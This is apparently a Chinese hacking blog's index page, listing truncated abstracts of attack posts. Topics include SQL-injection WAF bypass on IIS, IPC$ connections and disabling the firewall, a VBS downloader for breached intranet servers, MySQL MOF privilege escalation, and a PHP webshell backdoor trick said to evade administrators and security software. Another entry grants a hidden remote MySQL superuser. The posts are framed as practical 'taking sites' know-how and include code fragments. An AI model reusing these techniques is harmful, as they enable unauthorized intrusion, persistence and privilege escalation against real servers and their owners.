摘要:
SQL注入:至于+ /**/就不说了,来些实际的。1、关键字可以用%(只限IIS系列)。比如select,可以sel%e%ct。原理:网络层waf对SEL%E%CT进行url解码后变成SEL%E%CT,匹配select失败,而进入asp.dll对SEL%E%CT进行url解码却变成select。II... 阅读全文
摘要:
0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识、理解、学习。这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦。如果在阅读中有任何问题都可以与我邮件联系(contact@x0day.me)0x01 在kali中使用m... 阅读全文
摘要:
开启服务 net start Schedulenet start wmiApSrv关闭防火墙 net stop sharedaccessnet use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$试环境:主机(w... 阅读全文
摘要:
首先确定这个网站使用thinkphp的框架国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考admin是后台工程文... 阅读全文
摘要:
当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望一、VBS下载者: 复制代码 代码如下:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObjec... 阅读全文
摘要:
今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普这里我综合各类mof提权进行了综合首先说一下,无shell情况下的mysql远程mof提权利用方法详解 就是你注入拿到了数据库的root账号密码,直接进行 扫到一个站的注入 ... 阅读全文
摘要:
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。<?phpfile_put_contents('xpxp.php',"$_GET[... 阅读全文
摘要:
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day... 阅读全文
摘要:
PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WIT... 阅读全文
摘要:
第一部分是指在Android系统的手机上直接写PHP脚本代码并立即运行;第二部分则继续讲解如何把写好的PHP脚本代码打包成akp安装文件。 首先,在手机上安装两个apk包。 一个是SL4A(Scripting Layer for Android),这个是Android的脚本环境,前身是ASE... 阅读全文